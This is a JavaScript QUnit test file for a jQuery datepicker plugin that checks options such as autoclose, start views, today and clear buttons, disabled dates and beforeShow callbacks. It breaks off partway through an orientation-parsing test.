module('Options', {
    setup: function(){},
    teardown: function(){
        $('#qunit-fixture *').each(function(){
            var t = $(this);
            if ('datepicker' in t.data())
                t.datepicker('remove');
        });
    }
});

test('Autoclose', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    autoclose: true
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;


    input.focus();
    ok(picker.is(':visible'), 'Picker is visible');
    target = picker.find('.datepicker-days tbody td:nth(7)');
    equal(target.text(), '4'); // Mar 4

    target.click();
    ok(picker.is(':not(:visible)'), 'Picker is hidden');
    datesEqual(dp.dates[0], UTCDate(2012, 2, 4));
    datesEqual(dp.viewDate, UTCDate(2012, 2, 4));
});

test('Custom date formatter functions', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2015-09-18T00:00:00.000Z')
                .datepicker({
                    format: {
                        /*
                        Say our UI should display a week ahead,
                        but textbox should store the actual date.
                        This is useful if we need UI to select local dates,
                        but store in UTC
                        */
                        toDisplay: function (date, format, language) {
                            var d = new Date(date);
                            d.setDate(d.getDate() - 7);
                            return d.toISOString();
                        },
                        toValue: function (date, format, language) {
                            var d = new Date(date);
                            d.setDate(d.getDate() + 7);
                            return new Date(d);
                        }
                    },
                    autoclose: true
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;
    //Value is ISO format and is 7 days older than UI
    equal(input.val(), '2015-09-18T00:00:00.000Z');
    datesEqual(dp.dates[0], UTCDate(2015, 8, 25));
    datesEqual(dp.viewDate, UTCDate(2015, 8, 25));

    input.focus();
    ok(picker.is(':visible'), 'Picker is visible');
    target = picker.find('.datepicker-days tbody td:nth(5)');
    equal(target.text(), '4'); // Sep 4

    target.click();
    ok(picker.is(':not(:visible)'), 'Picker is hidden');
    //Value is now 28th Aug 2015 in ISO format
    //and is 7 days older than UI
    equal(input.val(), '2015-08-28T00:00:00.000Z');
    datesEqual(dp.dates[0], UTCDate(2015, 8, 4));
    datesEqual(dp.viewDate, UTCDate(2015, 8, 4));
});

test('Startview: year view (integer)', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    startView: 1
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    ok(picker.find('.datepicker-days').is(':not(:visible)'), 'Days view hidden');
    ok(picker.find('.datepicker-months').is(':visible'), 'Months view visible');
    ok(picker.find('.datepicker-years').is(':not(:visible)'), 'Years view hidden');
    ok(picker.find('.datepicker-decades').is(':not(:visible)'), 'Decades view hidden');
    ok(picker.find('.datepicker-centuries').is(':not(:visible)'), 'Centuries view hidden');
});

test('Startview: year view (string)', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    startView: 'year'
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    ok(picker.find('.datepicker-days').is(':not(:visible)'), 'Days view hidden');
    ok(picker.find('.datepicker-months').is(':visible'), 'Months view visible');
    ok(picker.find('.datepicker-years').is(':not(:visible)'), 'Years view hidden');
    ok(picker.find('.datepicker-decades').is(':not(:visible)'), 'Decades view hidden');
    ok(picker.find('.datepicker-centuries').is(':not(:visible)'), 'Centuries view hidden');
});

test('Startview: decade view (integer)', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    startView: 2
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    ok(picker.find('.datepicker-days').is(':not(:visible)'), 'Days view hidden');
    ok(picker.find('.datepicker-months').is(':not(:visible)'), 'Months view hidden');
    ok(picker.find('.datepicker-years').is(':visible'), 'Years view visible');
    ok(picker.find('.datepicker-decades').is(':not(:visible)'), 'Decades view hidden');
    ok(picker.find('.datepicker-centuries').is(':not(:visible)'), 'Centuries view hidden');
});

test('Startview: decade view (string)', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    startView: 'decade'
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    ok(picker.find('.datepicker-days').is(':not(:visible)'), 'Days view hidden');
    ok(picker.find('.datepicker-months').is(':not(:visible)'), 'Months view hidden');
    ok(picker.find('.datepicker-years').is(':visible'), 'Years view visible');
    ok(picker.find('.datepicker-decades').is(':not(:visible)'), 'Decades view hidden');
    ok(picker.find('.datepicker-centuries').is(':not(:visible)'), 'Centuries view hidden');
});

test('Startview: century view (integer)', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    startView: 3
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    ok(picker.find('.datepicker-days').is(':not(:visible)'), 'Days view hidden');
    ok(picker.find('.datepicker-months').is(':not(:visible)'), 'Months view hidden');
    ok(picker.find('.datepicker-years').is(':not(:visible)'), 'Years view hidden');
    ok(picker.find('.datepicker-decades').is(':visible'), 'Decades view visible');
    ok(picker.find('.datepicker-centuries').is(':not(:visible)'), 'Centuries view hidden');
});

test('Startview: century view (string)', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    startView: 'century'
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    ok(picker.find('.datepicker-days').is(':not(:visible)'), 'Days view hidden');
    ok(picker.find('.datepicker-months').is(':not(:visible)'), 'Months view hidden');
    ok(picker.find('.datepicker-years').is(':not(:visible)'), 'Years view hidden');
    ok(picker.find('.datepicker-decades').is(':visible'), 'Decades view visible');
    ok(picker.find('.datepicker-centuries').is(':not(:visible)'), 'Centuries view hidden');
});

test('Startview: millennium view (integer)', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    startView: 4
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    ok(picker.find('.datepicker-days').is(':not(:visible)'), 'Days view hidden');
    ok(picker.find('.datepicker-months').is(':not(:visible)'), 'Months view hidden');
    ok(picker.find('.datepicker-years').is(':not(:visible)'), 'Years view hidden');
    ok(picker.find('.datepicker-decades').is(':not(:visible)'), 'Decades view hidden');
    ok(picker.find('.datepicker-centuries').is(':visible'), 'Centuries view visible');
});

test('Startview: millennium view (string)', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    startView: 'millennium'
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    ok(picker.find('.datepicker-days').is(':not(:visible)'), 'Days view hidden');
    ok(picker.find('.datepicker-months').is(':not(:visible)'), 'Months view hidden');
    ok(picker.find('.datepicker-years').is(':not(:visible)'), 'Years view hidden');
    ok(picker.find('.datepicker-decades').is(':not(:visible)'), 'Decades view hidden');
    ok(picker.find('.datepicker-centuries').is(':visible'), 'Centuries view visible');
});

test('Today Button: today button not default', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd'
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    ok(picker.find('.datepicker-days').is(':visible'), 'Days view visible');
    ok(picker.find('.datepicker-days tfoot .today').is(':not(:visible)'), 'Today button not visible');
});

test('Today Button: today visibility when enabled', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    todayBtn: true
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    ok(picker.find('.datepicker-days').is(':visible'), 'Days view visible');
    ok(picker.find('.datepicker-days tfoot .today').is(':visible'), 'Today button visible');

    picker.find('.datepicker-days thead th.datepicker-switch').click();
    ok(picker.find('.datepicker-months').is(':visible'), 'Months view visible');
    ok(picker.find('.datepicker-months tfoot .today').is(':visible'), 'Today button visible');

    picker.find('.datepicker-months thead th.datepicker-switch').click();
    ok(picker.find('.datepicker-years').is(':visible'), 'Years view visible');
    ok(picker.find('.datepicker-years tfoot .today').is(':visible'), 'Today button visible');
});

test('Today Button: data-api', function(){
    var input = $('<input data-date-today-btn="true" />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd'
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    ok(picker.find('.datepicker-days').is(':visible'), 'Days view visible');
    ok(picker.find('.datepicker-days tfoot .today').is(':visible'), 'Today button visible');
});

test('Today Button: moves to today\'s date', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    todayBtn: true
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    ok(picker.find('.datepicker-days').is(':visible'), 'Days view visible');
    ok(picker.find('.datepicker-days tfoot .today').is(':visible'), 'Today button visible');

    target = picker.find('.datepicker-days tfoot .today');
    target.click();

    var d = new Date(),
        today = UTCDate(d.getFullYear(), d.getMonth(), d.getDate());
    datesEqual(dp.viewDate, today);
    datesEqual(dp.dates[0], UTCDate(2012, 2, 5));
});

test('Today Button: moves to days view', function(){
    var viewModes = $.fn.datepicker.DPGlobal.viewModes;
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    startView: viewModes.length - 1,
                    todayBtn: true
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    target = picker.find('tfoot .today').filter(':visible');

    target.click();
    ok(picker.find('.datepicker-days tfoot .today').is(':visible'), 'Today button visible');
});

test('Today Button: "linked" selects today\'s date', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    todayBtn: "linked"
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    ok(picker.find('.datepicker-days').is(':visible'), 'Days view visible');
    ok(picker.find('.datepicker-days tfoot .today').is(':visible'), 'Today button visible');

    target = picker.find('.datepicker-days tfoot .today');
    target.click();

    var d = new Date(),
        today = UTCDate(d.getFullYear(), d.getMonth(), d.getDate());
    datesEqual(dp.viewDate, today);
    datesEqual(dp.dates[0], today);
});

test('Today Highlight: today\'s date is not highlighted by default', patch_date(function(Date){
    Date.now = UTCDate(2012, 2, 15);
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd'
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    ok(picker.find('.datepicker-days').is(':visible'), 'Days view visible');
    equal(picker.find('.datepicker-days thead .datepicker-switch').text(), 'March 2012', 'Title is "March 2012"');

    target = picker.find('.datepicker-days tbody td:contains(15)');
    ok(!target.hasClass('today'), 'Today is not marked with "today" class');
    target = picker.find('.datepicker-days tbody td:contains(14)');
    ok(!target.hasClass('today'), 'Yesterday is not marked with "today" class');
    target = picker.find('.datepicker-days tbody td:contains(16)');
    ok(!target.hasClass('today'), 'Tomorrow is not marked with "today" class');
}));

test('Today Highlight: today\'s date is highlighted when not active', patch_date(function(Date){
    Date.now = new Date(2012, 2, 15);
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    todayHighlight: true
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    ok(picker.find('.datepicker-days').is(':visible'), 'Days view visible');
    equal(picker.find('.datepicker-days thead .datepicker-switch').text(), 'March 2012', 'Title is "March 2012"');

    target = picker.find('.datepicker-days tbody td:contains(15)');
    ok(target.hasClass('today'), 'Today is marked with "today" class');
    target = picker.find('.datepicker-days tbody td:contains(14)');
    ok(!target.hasClass('today'), 'Yesterday is not marked with "today" class');
    target = picker.find('.datepicker-days tbody td:contains(16)');
    ok(!target.hasClass('today'), 'Tomorrow is not marked with "today" class');
}));

test('Clear Button: clear visibility when enabled', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    clearBtn: true
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    ok(picker.find('.datepicker-days').is(':visible'), 'Days view visible');
    ok(picker.find('.datepicker-days tfoot .clear').is(':visible'), 'Clear button visible');

    picker.find('.datepicker-days thead th.datepicker-switch').click();
    ok(picker.find('.datepicker-months').is(':visible'), 'Months view visible');
    ok(picker.find('.datepicker-months tfoot .clear').is(':visible'), 'Clear button visible');

    picker.find('.datepicker-months thead th.datepicker-switch').click();
    ok(picker.find('.datepicker-years').is(':visible'), 'Years view visible');
    ok(picker.find('.datepicker-years tfoot .clear').is(':visible'), 'Clear button visible');
});

test('Clear Button: clears input value', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    clearBtn: true
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    ok(picker.find('.datepicker-days').is(':visible'), 'Days view visible');
    ok(picker.find('.datepicker-days tfoot .clear').is(':visible'), 'Today button visible');

    target = picker.find('.datepicker-days tfoot .clear');
    target.click();

    equal(input.val(),'',"Input value has been cleared.");
    ok(picker.is(':visible'), 'Picker is visible');
});

test('Clear Button: hides datepicker if autoclose is on', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    clearBtn: true,
                    autoclose: true
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    ok(picker.find('.datepicker-days').is(':visible'), 'Days view visible');
    ok(picker.find('.datepicker-days tfoot .clear').is(':visible'), 'Today button visible');

    target = picker.find('.datepicker-days tfoot .clear');
    target.click();

    equal(input.val(),'',"Input value has been cleared.");
    ok(picker.is(':not(:visible)'), 'Picker is hidden');
});

test('Active Toggle Default: when active date is selected it is not unset', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd'
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    // open our datepicker
    input.focus();

    // Initial value is selected
    ok(dp.dates.contains(UTCDate(2012, 2, 5)) !== -1, '2012-03-05 selected');

    // click on our active date
    target = picker.find('.datepicker-days .day.active');
    target.click();

    // make sure it's still set
    equal(input.val(), '2012-03-05', "Input value has not been cleared.");
});

test('Active Toggle Enabled (single date): when active date is selected it is unset', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    toggleActive: true
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    // open our datepicker
    input.focus();

    // Initial value is selected
    ok(dp.dates.contains(UTCDate(2012, 2, 5)) !== -1, '2012-03-05 selected');

    // click on our active date
    target = picker.find('.datepicker-days .day.active');
    target.click();

    // make sure it's no longer set
    equal(input.val(), '', "Input value has been cleared.");
});

test('Active Toggle Multidate Default: when one of the active dates is selected it is unset', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    multidate: true
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    // open our datepicker
    input.focus();

    // Initial value is selected
    ok(dp.dates.contains(UTCDate(2012, 2, 5)) !== -1, '2012-03-05 in dates');

    // Select additional date
    target = picker.find('.datepicker-days tbody td:nth(7)');
    target.click();
    datesEqual(dp.dates.get(-1), UTCDate(2012, 2, 4), '2012-03-04 in dates');
    datesEqual(dp.viewDate, UTCDate(2012, 2, 4));
    equal(input.val(), '2012-03-05,2012-03-04');

    // Unselect additional date
    target = picker.find('.datepicker-days tbody td:nth(7)');
    target.click();
    ok(dp.dates.contains(UTCDate(2012, 2, 4)) === -1, '2012-03-04 no longer in dates');
    datesEqual(dp.viewDate, UTCDate(2012, 2, 4));
    equal(input.val(), '2012-03-05');
});

test('Active Toggle Disabled: when active date is selected it remains', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    toggleActive: false
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    // open our datepicker
    input.focus();

    // Initial value is selected
    ok(dp.dates.contains(UTCDate(2012, 2, 5)) !== -1, '2012-03-05 selected');

    // click on our active date
    target = picker.find('.datepicker-days .day.active');
    target.click();

    // make sure it's still set
    ok(dp.dates.contains(UTCDate(2012, 2, 5)) !== -1, '2012-03-05 still selected');
    datesEqual(dp.viewDate, UTCDate(2012, 2, 5));
    equal(input.val(), '2012-03-05');
});

test('Active Toggle Multidate Disabled: when activeToggle is set to false, but multidate is set, the option is ignored and selecting an active date it is unset', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-03-05')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    multidate: true,
                    toggleActive: false
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    // open our datepicker
    input.focus();

    // Initial value is selected
    ok(dp.dates.contains(UTCDate(2012, 2, 5)) !== -1, '2012-03-05 in dates');

    // Select additional date
    target = picker.find('.datepicker-days tbody td:nth(7)');
    target.click();
    datesEqual(dp.dates.get(-1), UTCDate(2012, 2, 4), '2012-03-04 in dates');
    datesEqual(dp.viewDate, UTCDate(2012, 2, 4));
    equal(input.val(), '2012-03-05,2012-03-04');

    // Unselect additional date
    target = picker.find('.datepicker-days tbody td:nth(7)');
    target.click();
    ok(dp.dates.contains(UTCDate(2012, 2, 4)) === -1, '2012-03-04 no longer in dates');
    datesEqual(dp.viewDate, UTCDate(2012, 2, 4));
    equal(input.val(), '2012-03-05');
});

test('DaysOfWeekDisabled', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-10-26')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    daysOfWeekDisabled: '1,5'
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    target = picker.find('.datepicker-days tbody td:nth(22)');
    ok(target.hasClass('disabled'), 'Day of week is disabled');
    target = picker.find('.datepicker-days tbody td:nth(24)');
    ok(!target.hasClass('disabled'), 'Day of week is enabled');
    target = picker.find('.datepicker-days tbody td:nth(26)');
    ok(target.hasClass('disabled'), 'Day of week is disabled');
});

test('DaysOfWeekHighlighted', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-10-26')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    startDate: '2012-10-02',
                    daysOfWeekHighlighted: '1,5'
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    target = picker.find('.datepicker-days tbody td:nth(0)');
    ok(!target.hasClass('highlighted'), 'Day of week is not highlighted');
    target = picker.find('.datepicker-days tbody td:nth(22)');
    ok(target.hasClass('highlighted'), 'Day of week is highlighted');
    target = picker.find('.datepicker-days tbody td:nth(24)');
    ok(!target.hasClass('highlighted'), 'Day of week is not highlighted');
    target = picker.find('.datepicker-days tbody td:nth(26)');
    ok(target.hasClass('highlighted'), 'Day of week is highlighted');
});

test('DatesDisabled', function(){
    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-10-26')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    datesDisabled: ['2012-10-1', '2012-10-10', '2012-10-20']
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    target = picker.find('.datepicker-days tbody td:nth(1)');
    ok(target.hasClass('disabled'), 'Day of week is disabled');
    ok(target.hasClass('disabled-date'), 'Date is disabled');
    target = picker.find('.datepicker-days tbody td:nth(2)');
    ok(!target.hasClass('disabled'), 'Day of week is enabled');
    target = picker.find('.datepicker-days tbody td:nth(10)');
    ok(target.hasClass('disabled'), 'Day of week is disabled');
    ok(target.hasClass('disabled-date'), 'Date is disabled');
    target = picker.find('.datepicker-days tbody td:nth(11)');
    ok(!target.hasClass('disabled'), 'Day of week is enabled');
    target = picker.find('.datepicker-days tbody td:nth(20)');
    ok(target.hasClass('disabled'), 'Day of week is disabled');
    ok(target.hasClass('disabled-date'), 'Date is disabled');
    target = picker.find('.datepicker-days tbody td:nth(21)');
    ok(!target.hasClass('disabled'), 'Day of week is enabled');
});

test('DatesDisabled as attribute', function(){
    var input = $('<input data-date-dates-disabled="2012-10-1,2012-10-10,2012-10-20" />')
                .appendTo('#qunit-fixture')
                .val('2012-10-26')
                .datepicker({
                    format: 'yyyy-mm-dd'
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    target = picker.find('.datepicker-days tbody td:nth(1)');
    ok(target.hasClass('disabled'), 'Day of week is disabled');
    ok(target.hasClass('disabled-date'), 'Date is disabled');
    target = picker.find('.datepicker-days tbody td:nth(2)');
    ok(!target.hasClass('disabled'), 'Day of week is enabled');
    target = picker.find('.datepicker-days tbody td:nth(10)');
    ok(target.hasClass('disabled'), 'Day of week is disabled');
    ok(target.hasClass('disabled-date'), 'Date is disabled');
    target = picker.find('.datepicker-days tbody td:nth(11)');
    ok(!target.hasClass('disabled'), 'Day of week is enabled');
    target = picker.find('.datepicker-days tbody td:nth(20)');
    ok(target.hasClass('disabled'), 'Day of week is disabled');
    ok(target.hasClass('disabled-date'), 'Date is disabled');
    target = picker.find('.datepicker-days tbody td:nth(21)');
    ok(!target.hasClass('disabled'), 'Day of week is enabled');
});

test('BeforeShowDay', function(){

    var beforeShowDay = function(date) {
        switch (date.getDate()){
            case 25:
                return {
                    tooltip: 'Example tooltip',
                    classes: 'active'
                };
            case 26:
                return "test26";
            case 27:
                return {enabled: false, classes: 'test27'};
            case 28:
                return false;
            case 30:
                return { content: "foo" + date.getDate() }
        }
    };

    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-10-26')
                .datepicker({
                    format: 'yyyy-mm-dd',
                    beforeShowDay: beforeShowDay
                }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    target = picker.find('.datepicker-days tbody td:nth(25)');
    equal(target.attr('title'), 'Example tooltip', '25th has tooltip');
    ok(!target.hasClass('disabled'), '25th is enabled');
    target = picker.find('.datepicker-days tbody td:nth(26)');
    ok(target.hasClass('test26'), '26th has test26 class');
    ok(!target.hasClass('disabled'), '26th is enabled');
    target = picker.find('.datepicker-days tbody td:nth(27)');
    ok(target.hasClass('test27'), '27th has test27 class');
    ok(target.hasClass('disabled'), '27th is disabled');
    target = picker.find('.datepicker-days tbody td:nth(28)');
    ok(target.hasClass('disabled'), '28th is disabled');
    target = picker.find('.datepicker-days tbody td:nth(29)');
    ok(!target.hasClass('disabled'), '29th is enabled');
    target = picker.find('.datepicker-days tbody td:nth(30)');
    ok(target.text() == "foo30", '30th has custom content');
});

test('BeforeShowMonth regress .day content', function() {
    var input = $('<input />')
        .appendTo('#qunit-fixture')
        .val('2012-10-26')
        .datepicker({
            format: 'yyyy-mm-dd',
            beforeShowDay: function(date) {
                return {
                    content: '<strong>foo123</strong>'
                };
            }
        }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    target = picker.find('.datepicker-days tbody td:nth(30)');
    target.trigger('click');
    datesEqual(dp.viewDate, UTCDate(2012, 9, 30));
});

test('BeforeShowMonth', function () {

    var beforeShowMonth = function (date) {
        switch (date.getMonth()) {
            case 0:
                return {
                    tooltip: 'Example tooltip',
                    classes: 'active'
                };
            case 2:
                return "testMarch";
            case 4:
                return {enabled: false, classes: 'testMay'};
            case 5:
                return false;
        }
    };

    var input = $('<input />')
            .appendTo('#qunit-fixture')
            .val('2012-10-26')
            .datepicker({
                format: 'yyyy-mm-dd',
                beforeShowMonth: beforeShowMonth
            }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    target = picker.find('.datepicker-months tbody span:nth(0)');
    equal(target.attr('title'), 'Example tooltip', '1st has tooltip');
    ok(!target.hasClass('disabled'), 'January is enabled');
    target = picker.find('.datepicker-months tbody span:nth(2)');
    ok(target.hasClass('testMarch'), 'March has testMarch class');
    ok(!target.hasClass('disabled'), 'March enabled');
    target = picker.find('.datepicker-months tbody span:nth(4)');
    ok(target.hasClass('testMay'), 'May has testMay class');
    ok(target.hasClass('disabled'), 'May is disabled');
    target = picker.find('.datepicker-months tbody span:nth(5)');
    ok(target.hasClass('disabled'), 'June is disabled');
    target = picker.find('.datepicker-months tbody span:nth(6)');
    ok(!target.hasClass('disabled'), 'July is enabled');
});


test('BeforeShowYear', function () {

    var beforeShowYear = function (date) {
        switch (date.getFullYear()) {
            case 2013:
                return {
                    tooltip: 'Example tooltip',
                    classes: 'active'
                };
            case 2014:
                return "test2014";
            case 2015:
                return {enabled: false, classes: 'test2015'};
            case 2016:
                return false;
        }
    };

    var input = $('<input />')
            .appendTo('#qunit-fixture')
            .val('2012-10-26')
            .datepicker({
                format: 'yyyy-mm-dd',
                beforeShowYear: beforeShowYear
            }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    target = picker.find('.datepicker-years tbody span:nth(4)');
    equal(target.attr('title'), 'Example tooltip', '5th has tooltip');
    ok(!target.hasClass('disabled'), '2013, 5th is enabled');
    target = picker.find('.datepicker-years tbody span:nth(5)');
    ok(target.hasClass('test2014'), '6th has test2014 class');
    ok(!target.hasClass('disabled'), '2014, 6th is enabled');
    target = picker.find('.datepicker-years tbody span:nth(6)');
    ok(target.hasClass('test2015'), '2015, 7th has test2015 class');
    ok(target.hasClass('disabled'), '2015, 7th is disabled');
    target = picker.find('.datepicker-years tbody span:nth(7)');
    ok(target.hasClass('disabled'), '2016, 8th is disabled');
    target = picker.find('.datepicker-years tbody span:nth(8)');
    ok(!target.hasClass('disabled'), '2017, 9th is enabled');
});

test('beforeShowDecade', function () {
    var beforeShowDecade = function (date) {
        switch (date.getFullYear()) {
            case 2030:
                return {
                    tooltip: 'Example tooltip',
                    classes: 'active'
                };
            case 2040:
                return "test2040";
            case 2050:
                return {enabled: false, classes: 'test2050'};
            case 2060:
                return false;
        }
    };

    var input = $('<input />')
            .appendTo('#qunit-fixture')
            .val('03/05/2012')
            .datepicker({ beforeShowDecade: beforeShowDecade }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    target = picker.find('.datepicker-decades tbody span:nth(4)');
    equal(target.attr('title'), 'Example tooltip', '5th has tooltip');
    ok(!target.hasClass('disabled'), '2030, 5th is enabled');

    target = picker.find('.datepicker-decades tbody span:nth(5)');
    ok(target.hasClass('test2040'), '6th has test2040 class');
    ok(!target.hasClass('disabled'), '2040, 6th is enabled');

    target = picker.find('.datepicker-decades tbody span:nth(6)');
    ok(target.hasClass('test2050'), '2050, 7th has test2050 class');
    ok(target.hasClass('disabled'), '2050, 7th is disabled');

    target = picker.find('.datepicker-decades tbody span:nth(7)');
    ok(target.hasClass('disabled'), '2060, 8th is disabled');

    target = picker.find('.datepicker-decades tbody span:nth(8)');
    ok(!target.hasClass('disabled'), '2070, 9th is enabled');
});

test('beforeShowCentury', function () {
    var beforeShowCentury = function (date) {
        switch (date.getFullYear()) {
            case 2300:
                return {
                    tooltip: 'Example tooltip',
                    classes: 'active'
                };
            case 2400:
                return "test2400";
            case 2500:
                return {enabled: false, classes: 'test2500'};
            case 2600:
                return false;
        }
    };

    var input = $('<input />')
            .appendTo('#qunit-fixture')
            .val('03/05/2012')
            .datepicker({ beforeShowCentury: beforeShowCentury }),
        dp = input.data('datepicker'),
        picker = dp.picker,
        target;

    input.focus();
    target = picker.find('.datepicker-centuries tbody span:nth(4)');
    equal(target.attr('title'), 'Example tooltip', '5th has tooltip');
    ok(!target.hasClass('disabled'), '2300, 5th is enabled');

    target = picker.find('.datepicker-centuries tbody span:nth(5)');
    ok(target.hasClass('test2400'), '6th has test2400 class');
    ok(!target.hasClass('disabled'), '2400, 6th is enabled');

    target = picker.find('.datepicker-centuries tbody span:nth(6)');
    ok(target.hasClass('test2500'), '2500, 7th has test2500 class');
    ok(target.hasClass('disabled'), '2500, 7th is disabled');

    target = picker.find('.datepicker-centuries tbody span:nth(7)');
    ok(target.hasClass('disabled'), '2600, 8th is disabled');

    target = picker.find('.datepicker-centuries tbody span:nth(8)');
    ok(!target.hasClass('disabled'), '2700, 9th is enabled');
});

test('Orientation: values are parsed correctly', function(){

    var input = $('<input />')
                .appendTo('#qunit-fixture')
                .val('2012-10-26')
                .datepicker({
                    format: 'yyyy-mm-dd'
                }),
        dp = input.data('datepicker');

    equal(dp.o.orientation.x, 'auto');
    equal(dp.o.orientation.y, 'auto');

    dp._process_options({orientation: ''});
    equal(dp.o.orientation.x, 'auto', 'Empty value');
    equal(dp.o.orientation.y, 'auto', 'Empty value');

    dp._process_options({orientation: 'left'});
    equal(dp.o.orientation.x, 'left', '"left"');
    equal(dp.o.orientation.y, 'auto', '"left"');

    dp._process_options({orientation: 'right'});
    equal(dp.o.orientation.x, 'right', '"right"');
    equal(dp.o.orientation.y, 'auto', '"right"');

    dp._process_options({orientation: 'top'});
    equal(dp.o.orientation.x, 'auto', '"top"');
    equal(dp.o.orientation.y, 'top', '"top"');

    dp._process_options({orientation: 'bottom'});
